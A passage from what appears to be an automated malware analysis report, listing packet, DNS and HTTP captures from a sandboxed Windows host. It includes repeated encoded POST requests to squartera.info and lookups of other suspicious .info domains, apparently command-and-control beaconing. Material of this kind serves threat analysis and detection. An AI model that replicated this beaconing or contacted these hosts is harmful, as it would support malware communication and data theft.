Jan 16, 2018 10:39:34.010837078 MEZ	443	49189	23.45.113.221	192.168.0.53
Jan 16, 2018 10:39:34.459500074 MEZ	443	49189	23.45.113.221	192.168.0.53
Jan 16, 2018 10:39:34.460496902 MEZ	49189	443	192.168.0.53	23.45.113.221
Jan 16, 2018 10:39:36.102005959 MEZ	49189	443	192.168.0.53	23.45.113.221
Jan 16, 2018 10:39:36.102027893 MEZ	443	49189	23.45.113.221	192.168.0.53
Jan 16, 2018 10:39:36.889048100 MEZ	443	49189	23.45.113.221	192.168.0.53
Jan 16, 2018 10:39:36.889590979 MEZ	49189	443	192.168.0.53	23.45.113.221
Jan 16, 2018 10:39:38.174233913 MEZ	49189	443	192.168.0.53	23.45.113.221
Jan 16, 2018 10:39:38.174257040 MEZ	443	49189	23.45.113.221	192.168.0.53
Jan 16, 2018 10:39:38.850723982 MEZ	443	49189	23.45.113.221	192.168.0.53
Jan 16, 2018 10:39:38.851217031 MEZ	49189	443	192.168.0.53	23.45.113.221
Jan 16, 2018 10:39:40.272917986 MEZ	49189	443	192.168.0.53	23.45.113.221
Jan 16, 2018 10:39:40.272943020 MEZ	443	49189	23.45.113.221	192.168.0.53
Jan 16, 2018 10:39:41.078850985 MEZ	443	49189	23.45.113.221	192.168.0.53
Jan 16, 2018 10:39:41.079226971 MEZ	49189	443	192.168.0.53	23.45.113.221
Jan 16, 2018 10:39:42.375071049 MEZ	49189	443	192.168.0.53	23.45.113.221
Jan 16, 2018 10:39:42.375092030 MEZ	443	49189	23.45.113.221	192.168.0.53
Jan 16, 2018 10:39:43.300342083 MEZ	443	49189	23.45.113.221	192.168.0.53
Jan 16, 2018 10:39:43.300893068 MEZ	49189	443	192.168.0.53	23.45.113.221
Jan 16, 2018 10:39:43.863850117 MEZ	123	123	192.168.0.53	17.253.54.125
Jan 16, 2018 10:39:44.417535067 MEZ	49189	443	192.168.0.53	23.45.113.221
Jan 16, 2018 10:39:44.417557955 MEZ	443	49189	23.45.113.221	192.168.0.53
Jan 16, 2018 10:39:45.272310019 MEZ	443	49189	23.45.113.221	192.168.0.53
Jan 16, 2018 10:39:45.272629023 MEZ	49189	443	192.168.0.53	23.45.113.221
Jan 16, 2018 10:39:46.501255035 MEZ	49189	443	192.168.0.53	23.45.113.221
Jan 16, 2018 10:39:46.501281023 MEZ	443	49189	23.45.113.221	192.168.0.53
Jan 16, 2018 10:39:47.300358057 MEZ	443	49189	23.45.113.221	192.168.0.53
Jan 16, 2018 10:39:47.300888062 MEZ	49189	443	192.168.0.53	23.45.113.221
Jan 16, 2018 10:39:49.043034077 MEZ	49189	443	192.168.0.53	23.45.113.221
Jan 16, 2018 10:39:49.043055058 MEZ	443	49189	23.45.113.221	192.168.0.53
Jan 16, 2018 10:39:49.716077089 MEZ	443	49189	23.45.113.221	192.168.0.53
Jan 16, 2018 10:39:49.716593027 MEZ	49189	443	192.168.0.53	23.45.113.221
Jan 16, 2018 10:40:32.424252987 MEZ	49189	443	192.168.0.53	23.45.113.221
Jan 16, 2018 10:40:32.424417973 MEZ	443	49189	23.45.113.221	192.168.0.53
Jan 16, 2018 10:40:32.424876928 MEZ	49189	443	192.168.0.53	23.45.113.221

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 16, 2018 10:38:30.210139036 MEZ	57875	53	192.168.0.53	8.8.8.8
Jan 16, 2018 10:38:30.612297058 MEZ	53	57875	8.8.8.8	192.168.0.53
Jan 16, 2018 10:38:32.109383106 MEZ	56351	53	192.168.0.53	8.8.8.8
Jan 16, 2018 10:38:32.109441996 MEZ	53	56351	8.8.8.8	192.168.0.53
Jan 16, 2018 10:38:32.115458965 MEZ	53017	53	192.168.0.53	8.8.8.8
Jan 16, 2018 10:38:32.115931034 MEZ	63638	53	192.168.0.53	8.8.8.8
Jan 16, 2018 10:38:32.479837894 MEZ	53	53017	8.8.8.8	192.168.0.53
Jan 16, 2018 10:38:32.683762074 MEZ	53	63638	8.8.8.8	192.168.0.53
Jan 16, 2018 10:38:33.324394941 MEZ	123	123	192.168.0.53	17.253.54.125
Jan 16, 2018 10:38:35.750128984 MEZ	56806	53	192.168.0.53	8.8.8.8
Jan 16, 2018 10:38:36.481611013 MEZ	53	56806	8.8.8.8	192.168.0.53
Jan 16, 2018 10:38:39.596726894 MEZ	65226	53	192.168.0.53	82.163.143.135
Jan 16, 2018 10:38:39.596867085 MEZ	53	65226	82.163.143.135	192.168.0.53
Jan 16, 2018 10:38:39.597529888 MEZ	65226	53	192.168.0.53	82.163.142.137
Jan 16, 2018 10:38:39.597626925 MEZ	53	65226	82.163.142.137	192.168.0.53
Jan 16, 2018 10:38:39.597929001 MEZ	50111	53	192.168.0.53	82.163.143.135
Jan 16, 2018 10:38:39.597970009 MEZ	53	50111	82.163.143.135	192.168.0.53
Jan 16, 2018 10:38:40.114228010 MEZ	57717	53	192.168.0.53	82.163.143.135
Jan 16, 2018 10:38:40.116482019 MEZ	62127	53	192.168.0.53	82.163.143.135
Jan 16, 2018 10:38:40.118319988 MEZ	50145	53	192.168.0.53	82.163.143.135
Jan 16, 2018 10:38:40.121865034 MEZ	59764	53	192.168.0.53	82.163.143.135
Jan 16, 2018 10:38:40.548860073 MEZ	62965	53	192.168.0.53	82.163.143.135
Jan 16, 2018 10:38:40.841768026 MEZ	53	57717	82.163.143.135	192.168.0.53
Jan 16, 2018 10:38:41.007045984 MEZ	53	62127	82.163.143.135	192.168.0.53
Jan 16, 2018 10:38:41.063930988 MEZ	53	50145	82.163.143.135	192.168.0.53
Jan 16, 2018 10:38:41.188694954 MEZ	59764	53	192.168.0.53	82.163.143.135
Jan 16, 2018 10:38:41.190223932 MEZ	53	59764	82.163.143.135	192.168.0.53
Jan 16, 2018 10:38:41.223583937 MEZ	52922	53	192.168.0.53	82.163.143.135
Jan 16, 2018 10:38:41.392683029 MEZ	53	62965	82.163.143.135	192.168.0.53
Jan 16, 2018 10:38:41.926094055 MEZ	53	59764	82.163.143.135	192.168.0.53
Jan 16, 2018 10:38:42.070797920 MEZ	53	52922	82.163.143.135	192.168.0.53
Jan 16, 2018 10:38:42.876209021 MEZ	54507	53	192.168.0.53	82.163.143.135
Jan 16, 2018 10:38:43.570421934 MEZ	53	54507	82.163.143.135	192.168.0.53
Jan 16, 2018 10:39:15.283921957 MEZ	52805	53	192.168.0.53	82.163.143.135
Jan 16, 2018 10:39:15.659476995 MEZ	53	52805	82.163.143.135	192.168.0.53
Jan 16, 2018 10:39:43.863850117 MEZ	123	123	192.168.0.53	17.253.54.125

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Jan 16, 2018 10:38:32.109935999 MEZ	192.168.0.53	8.8.8.8	2089	(Port unreachable)	Destination Unreachable
Jan 16, 2018 10:38:41.926675081 MEZ	192.168.0.53	82.163.143.135	130f	(Port unreachable)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jan 16, 2018 10:38:32.115458965 MEZ	192.168.0.53	8.8.8.8	0xaac4	Standard query (0)	W7	A (IP address)	IN (0x0001)
Jan 16, 2018 10:38:32.115931034 MEZ	192.168.0.53	8.8.8.8	0x6a12	Standard query (0)	W7	28	IN (0x0001)
Jan 16, 2018 10:38:35.750128984 MEZ	192.168.0.53	8.8.8.8	0x23d3	Standard query (0)	squartera.info	A (IP address)	IN (0x0001)
Jan 16, 2018 10:38:41.223583937 MEZ	192.168.0.53	82.163.143.135	0xe0b0	Standard query (0)	honouncil.info	A (IP address)	IN (0x0001)
Jan 16, 2018 10:38:42.876209021 MEZ	192.168.0.53	82.163.143.135	0x5f26	Standard query (0)	gorensin.info	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Replay Code	Name	CName	Address	Type	Class
Jan 16, 2018 10:38:32.479837894 MEZ	8.8.8.8	192.168.0.53	0xaac4	Name error (3)	W7	none	none	A (IP address)	IN (0x0001)
Jan 16, 2018 10:38:32.683762074 MEZ	8.8.8.8	192.168.0.53	0x6a12	Name error (3)	W7	none	none	28	IN (0x0001)
Jan 16, 2018 10:38:36.481611013 MEZ	8.8.8.8	192.168.0.53	0x23d3	No error (0)	squartera.info		104.31.80.139	A (IP address)	IN (0x0001)
Jan 16, 2018 10:38:42.070797920 MEZ	82.163.143.135	192.168.0.53	0xe0b0	No error (0)	honouncil.info		104.28.13.190	A (IP address)	IN (0x0001)
Jan 16, 2018 10:38:43.570421934 MEZ	82.163.143.135	192.168.0.53	0x5f26	No error (0)	gorensin.info		104.27.134.218	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

squartera.info

honouncil.info

gorensin.info

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port
0	192.168.0.53	49196	104.31.80.139	80

Timestamp	kBytes transferred	Direction	Data
Jan 16, 2018 10:38:36.485268116 MEZ	17	OUT	POST / HTTP/1.1 Host: squartera.info User-Agent: Content-Type: application/x-www-form-urlencoded Content-Length: 2347 Accept-Encoding: gzip Connection: close
Jan 16, 2018 10:38:36.485536098 MEZ	19	OUT	Data Raw: 72 3d 50 77 2d 6d 66 66 31 41 62 74 46 49 64 34 6e 6a 30 38 61 45 79 50 48 7a 42 6e 73 6d 57 31 57 55 47 74 6a 77 34 2d 70 4f 2d 58 6f 36 57 50 77 71 39 6f 64 4f 48 79 67 67 56 36 70 45 69 46 44 48 37 6e 61 73 36 79 42 52 78 4f 6a 4e 4d 5a 58 5f Data Ascii: r=Pw-mff1AbtFId4nj08aEyPHzBnsmW1WUGtjw4-pO-Xo6WPwq9odOHyggV6pEiFDH7nas6yBRxOjNMZX_7QPPtwuNxxBjzKCEuxxaSWffO4lsTSdjkgde-MV4sZffa0WAjU0pbCMq5zAVqDKukJr6XreXOcPIDu-ZN99wQbVmg6Uxm0ljMpEt9GbwSBlMcsp0ekcjagVESvOFmWFp7iuPsn0qa5rlEyyVTOTeQ3gw0K9KHycNZ
Jan 16, 2018 10:38:37.335010052 MEZ	21	IN	HTTP/1.1 403 Forbidden Date: Tue, 16 Jan 2018 09:38:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: __cfduid=df796dfccc6ae48cae241485425b647831516095516; expires=Wed, 16-Jan-19 09:38:36 GMT; path=/; domain=.squartera.info; HttpOnly CF-Chl-Bypass: 1 Cache-Control: max-age=2 Expires: Tue, 16 Jan 2018 09:38:38 GMT X-Frame-Options: SAMEORIGIN Server: cloudflare CF-RAY: 3de01a54e2f53e68-ZRH Content-Encoding: gzip Data Raw: 37 39 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ad 58 6d 6f db b6 16 fe ee 5f 71 aa 02 db 97 c8 b2 d3 a6 2f 8e a4 22 cd 3a 2c 17 f7 62 c1 d6 60 2b 86 c2 a0 a9 23 89 31 45 aa 24 65 c7 db dd 7f 1f 48 4a b6 2c 3b 69 52 cc f9 12 92 87 0f cf 79 78 de a8 f8 d9 0f 3f 5f 7e fc 74 fd 01 4a 53 f1 74 14 3f 0b c3 3f 58 0e dc c0 d5 07 78 fd 39 85 d8 2e 00 e5 44 eb 24 10 32 bc d5 c0 f0 15 48 9e 31 0c 80 13 51 24 01 8a f0 e6 d7 20 85 f8 d9 1f 28 32 96 7f 0e c3 1d 54 8b 03 70 1c ea f5 d3 a0 de 3c 00 f5 e6 09 50 85 69 d1 ec c4 31 2b 0f 51 c2 70 1f a9 44 92 a5 a3 d8 30 c3 31 bd 30 06 85 61 52 c0 2f f8 a5 61 0a b3 67 f0 7f b8 e4 b2 c9 72 4e 14 c6 91 97 1b c5 15 1a 02 82 54 98 04 94 d4 86 96 24 5c 6c 6a a2 75 00 2c 3b 9c 8b ba 2d b4 24 4a a3 49 82 9b 8f 3f 86 6f 7a 0b a5 31 75 68 0f 5d 25 c1 a5 14 56 8f f0 e3 a6 c6 00 a8 1f 25 81 c1 3b 13 59 13 cf b7 30 0f a1 fc 1e de 5c 84 97 b2 aa 89 61 0b de 07 ba fa 90 7c c8 0a 3c a1 a5 92 15 26 d3 1e 80 37 49 c9 85 34 ba b7 43 48 26 32 bc 3b 01 21 73 c9 b9 5c 1f 6c 59 31 5c d7 52 99 de a6 35 cb 4c 99 64 b8 62 14 43 37 38 61 82 19 46 78 a8 29 e1 98 4c 4f 2a 72 c7 aa a6 ea c6 1e 95 33 b1 04 85 3c 09 b4 d9 70 d4 25 a2 69 69 cd e7 7e 2a a4 96 d5 52 61 9e 04 11 cd 44 48 0b 16 f9 a5 88 e6 63 54 4a 2a 3d 76 42 66 53 63 cb 9d 1b 57 98 31 92 04 9a 2a 44 71 52 2b 79 8b d4 5e b9 3f 7b 2f 72 de 7e 4e ef 57 e6 fb 9d 32 0c ad 3e df 7f 55 1f 86 4f 57 69 df 5b 1d e4 70 7f ba 90 d9 e6 af 8a a8 82 89 d9 e4 bc 26 59 c6 44 31 9b fc 1d 7b 15 fa 66 61 67 97 a6 8a d5 a6 0f 75 4b 56 c4 cf 06 a0 15 ed 1b e2 66 75 74 fb a5 41 b5 19 57 4c 8c 6f 75 90 c6 ed 42 7a 4f 6c ba b3 a6 93 36 3a bf e9 c4 3f b1 36 f2 d8 81 c3 30 fe 16 70 9a 8f a9 ac 2a 39 00 1f 8d 46 71 d4 a6 05 cb 6c 3a 02 88 33 b6 6a 3d 30 5c 2b 52 d7 a8 02 3b df ae b4 29 87 e6 21 e1 a8 0c 74 ff 84 ee e2 ed 90 4a b9 64 e8 c7 ad 2f fb 19 27 17 40 46 0c 09 8d 22 42 73 62 d0 26 2c b2 e0 38 f7 42 3a 48 af 39 12 8d e0 a7 a1 9d 1e c7 51 c6 56 3d 3d 5a 0d dd 29 61 86 86 30 6e a3 78 ab dd de c2 c0 90 03 53 da 65 ab bd 65 c3 ff e7 11 e4 0a 95 0d f8 ed 56 9b cb a7 07 46 d0 92 70 8e a2 c0 b9 05 e0 4c 60 90 fe 2c 10 2a a9 10 b4 c1 3a 8e ca 69 1f e2 b4 77 bc 6e 16 bb 5d b1 ae 89 38 c4 97 55 cd d1 e0 5c 23 9d d3 12 e9 72 4b 54 b7 04 a6 44 d0 48 1b c5 cc 06 9c 0c 18 09 84 52 d4 3a 8e 2c 6c 0a fa 4b 43 94 41 45 c6 4c e4 32 8e ca d3 2d 25 8e 60 eb 6e 10 8d 5b 16 ac bf f9 d5 e3 bc 69 1f bc 8e 37 56 94 9c 15 a5 f3 88 ae 26 d8 fc 48 98 e8 11 7f 1f f5 3d 81 03 11 2a 79 53 09 0d 66 2d f7 c4 ee 11 1c c8 ec 0d 0e b6 6c d5 0e 99 58 a1 b2 74 e6 61 2e 55 15 6a 43 e8 12 b3 01 9a 83 b0 eb 5b 8c ee e2 dd ae d6 df 07 73 c4 b1 d4 0b 4b 1e d1 72 39 6f 59 b2 49 d1 94 32 4b 82 02 8d 3b ee 9b 43 bc 3b d7 46 79 eb 42 0e 42 48 55 11 1e 80 9f 53 64 93 04 2f 32 9c 4c c9 d9 4b 3c cd cf 5e e0 ab 37 01 10 bd 11 d4 4b 68 66 70 89 9b 24 78 f5 df fc 3d bb fb 74 73 61 7f ef cb ec a7 8d f8 f1 e6 ea 7f 17 73 4d 5e ea f0 77 fd 9f 95 b8 35 c5 fb 49 Data Ascii: 79aXmo_q/":,b`+#1E$eHJ,;iRyx?_~tJSt??Xx9.D$2H1Q$ (2Tp<Pi1+QpD010aR/agrNT$\lju,;-$JI?oz1uh]%V%;Y0\a\|<&7I4CH&2;!s\lY1\R5LdbC78aFx)LOr3<p%ii~RaDHcTJ=vBfScW1DqR+y^?{/r~NW2>UOWi[p&YD1{faguKVfutAWLouBzOl6:?60p9Fql:3j=0\+R;)!tJd/'@F"Bsb&,8B:H9QV==Z)a0nxSeeVFpL`,:iwn]8U\#rKTDHR:,lKCAEL2-%`n[i7V&H=*ySf-lXta.UjC[sKr9oYI2K;C;FyBBHUSd/2LK<^7Khfp$x=tsasM^w5I
Jan 16, 2018 10:38:37.335021019 MEZ	22	IN	Data Raw: 3f a7 ec 73 5c 84 0a 3b 43 d3 6d 10 c7 42 b6 36 b6 71 bc ed 22 a4 5c 56 44 2d fb a1 dc ad 59 8f ed a5 a2 d4 1d e3 d2 7e 5b 80 67 f0 62 72 5a df ed 45 79 cf f1 58 ae 48 85 9e 3e db 3d e8 59 14 ad d7 eb 71 21 65 c1 d1 26 c8 68 ab 6b 44 6a 16 e5 84 Data Ascii: ?s\;CmB6q"\VD-Y~[gbrZEyXH>=Yq!e&hkDjwD;d!U*&h$fB=^:)R~X'`B#Lis33[Xm)a+gI)lD6[5i}Zrs:[-Xg;gD!qsPCO-rz6

Session ID	Source IP	Source Port	Destination IP	Destination Port
1	192.168.0.53	49197	104.31.80.139	80

Timestamp	kBytes transferred	Direction	Data
Jan 16, 2018 10:38:37.366035938 MEZ	23	OUT	POST / HTTP/1.1 Host: squartera.info Content-Type: application/x-www-form-urlencoded Cookie: __cfduid=df796dfccc6ae48cae241485425b647831516095516 User-Agent: Content-Length: 2347 Accept-Encoding: gzip Connection: close
Jan 16, 2018 10:38:37.366321087 MEZ	25	OUT	Data Raw: 72 3d 50 77 2d 6d 66 66 31 41 62 74 46 49 64 34 6e 6a 30 38 61 45 79 50 48 7a 42 6e 73 6d 57 31 57 55 47 74 6a 77 34 2d 70 4f 2d 58 6f 36 57 50 77 71 39 6f 64 4f 48 79 67 67 56 36 70 45 69 46 44 48 37 6e 61 73 36 79 42 52 78 4f 6a 4e 4d 5a 58 5f Data Ascii: r=Pw-mff1AbtFId4nj08aEyPHzBnsmW1WUGtjw4-pO-Xo6WPwq9odOHyggV6pEiFDH7nas6yBRxOjNMZX_7QPPtwuNxxBjzKCEuxxaSWffO4lsTSdjkgde-MV4sZffa0WAjU0pbCMq5zAVqDKukJr6XreXOcPIDu-ZN99wQbVmg6Uxm0ljMpEt9GbwSBlMcsp0ekcjagVESvOFmWFp7iuPsn0qa5rlEyyVTOTeQ3gw0K9KHycNZ
Jan 16, 2018 10:38:38.219822884 MEZ	27	IN	HTTP/1.1 403 Forbidden Date: Tue, 16 Jan 2018 09:38:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Chl-Bypass: 1 Cache-Control: max-age=2 Expires: Tue, 16 Jan 2018 09:38:39 GMT X-Frame-Options: SAMEORIGIN Server: cloudflare CF-RAY: 3de01a5a912e3e5c-ZRH Content-Encoding: gzip Data Raw: 37 39 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ad 58 6d 6f db b6 16 fe ee 5f 71 aa 02 db 97 c8 b2 d3 a6 6d 1c 49 45 9a 75 58 2e ee c5 82 ad c1 56 0c 85 41 53 47 12 63 8a 54 49 ca 2f db dd 7f 1f 48 4a 8e 2c 3b 69 53 cc f9 12 92 87 0f cf 79 78 de a8 f8 d9 0f 3f 5f 7d f8 78 f3 1e 4a 53 f1 74 14 3f 0b c3 3f 58 0e dc c0 f5 7b 78 fd 29 85 d8 2e 00 e5 44 eb 24 10 32 bc d3 c0 f0 15 48 9e 31 0c 80 13 51 24 01 8a f0 f6 d7 20 85 f8 d9 1f 28 32 96 7f 0a c3 7b a8 16 07 e0 38 d4 eb a7 41 bd 79 04 ea cd 13 a0 0a d3 a2 d9 89 63 56 1e a2 84 e1 3e 52 89 24 4b 47 b1 61 86 63 7a 69 0c 0a c3 a4 80 5f f0 73 c3 14 66 cf e0 ff 70 c5 65 93 e5 9c 28 8c 23 2f 37 8a 2b 34 04 04 a9 30 09 28 a9 0d 2d 49 b8 d8 d6 44 eb 00 58 76 38 17 75 5b 68 49 94 46 93 04 b7 1f 7e 0c df f4 16 4a 63 ea d0 1e ba 4a 82 2b 29 ac 1e e1 87 6d 8d 01 50 3f 4a 02 83 1b 13 59 13 2f 76 30 8f a1 fc 1e de 5e 86 57 b2 aa 89 61 0b de 07 ba 7e 9f bc cf 0a 3c a1 a5 92 15 26 d3 1e 80 37 49 c9 85 34 ba b7 43 48 26 32 dc 9c 80 90 b9 e4 5c ae 0f b6 ac 18 ae 6b a9 4c 6f d3 9a 65 a6 4c 32 5c 31 8a a1 1b 9c 30 c1 0c 23 3c d4 94 70 4c a6 27 15 d9 b0 aa a9 ba b1 47 e5 4c 2c 41 21 4f 02 6d b6 1c 75 89 68 5a 5a f3 b9 9f 0a a9 65 b5 54 98 27 41 44 33 11 d2 82 45 7e 29 a2 f9 18 95 92 4a 8f 9d 90 d9 d6 d8 72 e7 c6 15 66 8c 24 81 a6 0a 51 9c d4 4a de 21 b5 57 ee cf de 8b 9c f3 4f e9 c3 ca 7c 7f af 0c 43 ab cf f7 5f d4 87 e1 d3 55 da f7 56 07 39 dc 9f 2e 64 b6 fd ab 22 aa 60 62 36 b9 a8 49 96 31 51 cc 26 7f c7 5e 85 be 59 d8 d9 a5 a9 62 b5 e9 43 dd 91 15 f1 b3 01 68 45 fb 86 b8 59 1d dd 7d 6e 50 6d c7 15 13 e3 3b 1d a4 71 bb 90 3e 10 9b ee ac e9 a4 8d ce 6f 3a f1 4f ac 8d 3c 76 e0 30 8c bf 05 9c e6 63 2a ab 4a 0e c0 47 a3 51 1c b5 69 c1 32 9b 8e 00 e2 8c ad 5a 0f 0c d7 8a d4 35 aa c0 ce b7 2b 6d ca a1 79 48 38 2a 03 dd 3f a1 bb 78 3b a4 52 2e 19 fa 71 eb cb 7e c6 c9 05 90 11 43 42 a3 88 d0 9c 18 b4 09 8b 2c 38 ce bd 90 0e d2 1b 8e 44 23 f8 69 68 a7 c7 71 94 b1 55 4f 8f 56 43 77 4a 98 a1 21 8c db 28 de 69 b7 b7 30 30 e4 c0 94 76 d9 6a 6f d9 f0 ff 79 04 b9 42 65 03 7e b7 d5 e6 f2 e9 81 11 b4 24 9c a3 28 70 6e 01 38 13 18 a4 3f 0b 84 4a 2a 04 6d b0 8e a3 72 da 87 38 ed 1d af 9b c5 fd ae 58 d7 44 1c e2 cb aa e6 68 70 ae 91 ce 69 89 74 b9 23 aa 5b 02 53 22 68 a4 8d 62 66 0b 4e 06 8c 04 42 29 6a 1d 47 16 36 05 fd b9 21 ca a0 22 63 26 72 19 47 e5 e9 8e 12 47 b0 75 37 88 c6 2d 0b d6 df fc ea 71 de b4 0f 5e c7 1b 2b 4a ce 8a d2 79 44 57 13 6c 7e 24 4c f4 88 7f 88 fa 9e c0 81 08 95 bc a9 84 06 b3 96 7b 62 0f 08 0e 64 f6 06 07 5b 76 6a 87 4c ac 50 59 3a f3 30 97 aa 0a b5 21 74 89 d9 00 cd 41 d8 f5 1d 46 77 f1 6e 57 eb ef 83 39 e2 58 ea 85 25 8f 68 b9 9c b7 2c d9 a4 68 4a 99 25 41 81 c6 1d f7 cd 21 de 9d 6b a3 bc 75 21 07 21 a4 aa 08 0f c0 cf 29 b2 4d 82 17 19 4e a6 e4 8c 9c 4f 4f f1 05 9e d1 00 88 de 0a ea 25 34 33 b8 c4 6d 12 bc fa 6f fe 8e 6d 3e de 5e da df bb 32 fb 69 2b 7e bc bd fe df e5 5c 93 97 3a fc 5d ff 67 25 ee 4c f1 6e d2 cf 29 fb 1c 17 a1 c2 ce d0 74 17 c4 b1 90 ad 8d 6d 1c ef ba 08 29 97 15 51 cb 7e 28 77 6b d6 63 7b a9 28 75 c7 b8 b4 df 16 e0 19 bc 98 9c d6 9b bd 28 ef 39 1e cb 15 a9 d0 d3 67 bb 07 3d 8b a2 f5 7a 3d 2e a4 2c 38 da 04 19 ed 74 8d 48 cd a2 9c 70 be 20 74 f9 76 99 7c 35 11 e0 0e 59 48 95 a1 4a 82 49 00 9a 2a c9 39 b3 ad 99 90 c1 31 7d 2f a0 44 eb 82 b3 97 a7 6e e4 37 87 4e 72 06 42 0a bc b0 d4 79 f5 f7 c3 b5 1f 96 43 e4 c9 03 58 b0 90 Data Ascii: 799Xmo_qmIEuX.VASGcTI/HJ,;iSyx?_}xJSt??X{x).D$2H1Q$ (2{8AycV>R$KGaczi_sfpe(#/7+40(-IDXv8u[hIF~JcJ+)mP?JY/v0^Wa~<&7I4CH&2\kLoeL2\10#<pL'GL,A!OmuhZZeT'AD3E~)Jrf$QJ!WO\|C_UV9.d"`b6I1Q&^YbChEY}nPm;q>o:O<v0cJGQi2Z5+myH8?x;R.q~CB,8D#ihqUOVCwJ!(i00vjoyBe~$(pn8?Jmr8XDhpit#[S"hbfNB)jG6!"c&rGGu7-q^+JyDWl~$L{bd[vjLPY:0!tAFwnW9X%h,hJ%A!ku!!)MNOO%43mom>^2i+~\:]g%Ln)tm)Q~(wkc{(u(9g=z=.,8tHp tv\|5YHJI91}/Dn7NrByCX
Jan 16, 2018 10:38:38.219834089 MEZ	28	IN	Data Raw: c6 c8 6a 06 53 77 1a c7 dc cc e0 f4 cc fe df 16 56 70 5b bb e2 ea 47 ca 69 d8 ca 59 52 0a 25 1b 91 cd e0 79 7e 6e ff ba a3 66 30 ad 37 a0 25 67 19 3c a7 53 fb b7 d3 42 91 8c 35 7a 06 2f ea cd 45 3f 23 58 0f 27 0a 89 73 86 9e c3 84 0a 75 2d 85 c6 Data Ascii: jSwVp[GiYR%y~nf07%g<SB5z/E?#X'su-zZoqIox!IimY7V7]+trtG6a7y]Kiv;LrQj8jaI+wXv}Ir

Session ID	Source IP	Source Port	Destination IP	Destination Port
2	192.168.0.53	49198	104.31.80.139	80

Timestamp	kBytes transferred	Direction	Data
Jan 16, 2018 10:38:38.227031946 MEZ	29	OUT	POST / HTTP/1.1 Host: squartera.info Content-Type: application/x-www-form-urlencoded Cookie: __cfduid=df796dfccc6ae48cae241485425b647831516095516 User-Agent: Content-Length: 2347 Accept-Encoding: gzip Connection: close
Jan 16, 2018 10:38:38.227294922 MEZ	32	OUT	Data Raw: 72 3d 50 77 2d 6d 66 66 31 41 62 74 46 49 64 34 6e 6a 30 38 61 45 79 50 48 7a 42 6e 73 6d 57 31 57 55 47 74 6a 77 34 2d 70 4f 2d 58 6f 36 57 50 77 71 39 6f 64 4f 48 79 67 67 56 36 70 45 69 46 44 48 37 6e 61 73 36 79 42 52 78 4f 6a 4e 4d 5a 58 5f Data Ascii: r=Pw-mff1AbtFId4nj08aEyPHzBnsmW1WUGtjw4-pO-Xo6WPwq9odOHyggV6pEiFDH7nas6yBRxOjNMZX_7QPPtwuNxxBjzKCEuxxaSWffO4lsTSdjkgde-MV4sZffa0WAjU0pbCMq5zAVqDKukJr6XreXOcPIDu-ZN99wQbVmg6Uxm0ljMpEt9GbwSBlMcsp0ekcjagVESvOFmWFp7iuPsn0qa5rlEyyVTOTeQ3gw0K9KHycNZ
Jan 16, 2018 10:38:39.037847042 MEZ	33	IN	HTTP/1.1 403 Forbidden Date: Tue, 16 Jan 2018 09:38:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Chl-Bypass: 1 Cache-Control: max-age=2 Expires: Tue, 16 Jan 2018 09:38:40 GMT X-Frame-Options: SAMEORIGIN Server: cloudflare CF-RAY: 3de01a5f60a73e62-ZRH Content-Encoding: gzip Data Raw: 37 39 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ad 58 6d 6f db b6 16 fe ee 5f 71 aa 02 db 97 c8 b2 d3 36 6d 1d 49 45 9a 75 58 2e ee c5 82 ad c1 56 0c 85 41 53 47 12 63 8a 54 49 ca 2f db dd 7f 1f 48 4a 8e 2c 3b 69 52 cc f9 12 92 87 0f cf 79 78 de a8 f8 d9 0f 3f 5f 7e fc 74 fd 01 4a 53 f1 74 14 3f 0b c3 3f 58 0e dc c0 d5 07 78 fd 39 85 d8 2e 00 e5 44 eb 24 10 32 bc d5 c0 f0 0c 24 cf 18 06 c0 89 28 92 00 45 78 f3 6b 90 42 fc ec 0f 14 19 cb 3f 87 e1 1d 54 8b 03 70 1c ea f5 d3 a0 de 3c 00 f5 e6 09 50 85 69 d1 ec c4 31 2b 0f 51 c2 70 1f a9 44 92 a5 a3 d8 30 c3 31 bd 30 06 85 61 52 c0 2f f8 a5 61 0a b3 67 f0 7f b8 e4 b2 c9 72 4e 14 c6 91 97 1b c5 15 1a 02 82 54 98 04 94 d4 86 96 24 5c 6c 6b a2 75 00 2c 3b 9c 8b ba 2d b4 24 4a a3 49 82 9b 8f 3f 86 6f 7a 0b a5 31 75 68 0f 5d 25 c1 a5 14 56 8f f0 e3 b6 c6 00 a8 1f 25 81 c1 8d 89 ac 89 e7 3b 98 87 50 7e 0f 6f 2e c2 4b 59 d5 c4 b0 05 ef 03 5d 7d 48 3e 64 05 9e d0 52 c9 0a 93 69 0f c0 9b a4 e4 42 1a dd db 21 24 13 19 6e 4e 40 c8 5c 72 2e d7 07 5b 56 0c d7 b5 54 a6 b7 69 cd 32 53 26 19 ae 18 c5 d0 0d 4e 98 60 86 11 1e 6a 4a 38 26 d3 93 8a 6c 58 d5 54 dd d8 a3 72 26 96 a0 90 27 81 36 5b 8e ba 44 34 2d ad f9 dc 4f 85 d4 b2 5a 2a cc 93 20 a2 99 08 69 c1 22 bf 14 d1 7c 8c 4a 49 a5 c7 4e c8 6c 6b 6c b9 73 e3 0a 33 46 92 40 53 85 28 4e 6a 25 6f 91 da 2b f7 67 ef 45 ce db cf e9 fd ca 7c 7f a7 0c 43 ab cf f7 5f d5 87 e1 d3 55 da f7 56 07 39 dc 9f 2e 64 b6 fd ab 22 aa 60 62 36 39 af 49 96 31 51 cc 26 7f c7 5e 85 be 59 d8 d9 a5 a9 62 b5 e9 43 dd 92 15 f1 b3 01 68 45 fb 86 b8 59 1d dd 7e 69 50 6d c7 15 13 e3 5b 1d a4 71 bb 90 de 13 9b ee ac e9 a4 8d ce 6f 3a f1 4f ac 8d 3c 76 e0 30 8c bf 05 9c e6 63 2a ab 4a 0e c0 47 a3 51 1c b5 69 